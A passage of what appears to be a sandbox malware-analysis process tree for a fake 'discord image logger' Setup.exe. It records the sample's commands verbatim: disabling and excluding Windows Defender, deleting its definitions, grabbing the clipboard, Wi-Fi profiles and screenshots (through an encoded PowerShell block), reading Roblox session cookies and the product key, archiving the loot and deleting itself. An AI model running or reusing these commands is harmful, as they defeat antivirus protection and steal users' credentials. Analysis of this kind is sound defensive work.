- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe"4⤵
- Views/modifies file attributes
PID:2968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1744
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:3264
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:3128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:1448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2636
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4792
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:456 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2148
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:3956
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:1848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:2808
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1144 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qszze5xt\qszze5xt.cmdline"5⤵PID:344
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB7F6.tmp" "c:\Users\Admin\AppData\Local\Temp\qszze5xt\CSCF14A83BC9B89419DBEE0E097A43B7B89.TMP"6⤵PID:3852
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵PID:2212
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1780
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵PID:2448
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1852
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4792
-
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2160
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3872
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:892
-
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1852
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4776
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3684
-
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:1100
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:4128
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:3464
-
C:\Windows\system32\getmac.exegetmac4⤵PID:2968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI37002\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\NECHb.zip" *"3⤵PID:3864
-
C:\Users\Admin\AppData\Local\Temp\_MEI37002\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI37002\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\NECHb.zip" *4⤵
- Executes dropped EXE
PID:3392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:1852
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:396
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵
- Suspicious behavior: EnumeratesProcesses
PID:644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:996
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
PID:884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:4740
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:3212
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:2876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:4572
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe""3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4568 -
C:\Windows\system32\PING.EXEping localhost -n 34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2876
-
-
-
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
PID:4700
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2500
-
C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe"C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe"1⤵PID:4136
-
C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe"C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe"2⤵
- Loads dropped DLL
PID:2676 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe'"3⤵PID:2180
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:2160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:2532
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
PID:3060
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:3160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error -100 (the initial part of the request has been received by the server and that the client should proceed with the request or ignore the response if the request has already finished)', 0, 'ERROR', 0+16);close()""3⤵PID:3400
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error -100 (the initial part of the request has been received by the server and that the client should proceed with the request or ignore the response if the request has already finished)', 0, 'ERROR', 0+16);close()"4⤵PID:3356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3212
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:2352
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵PID:880
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:4928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵PID:2464
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:5016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:3700
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:4236
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
PID:3048 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe"4⤵
- Views/modifies file attributes
PID:4928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵PID:4836
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
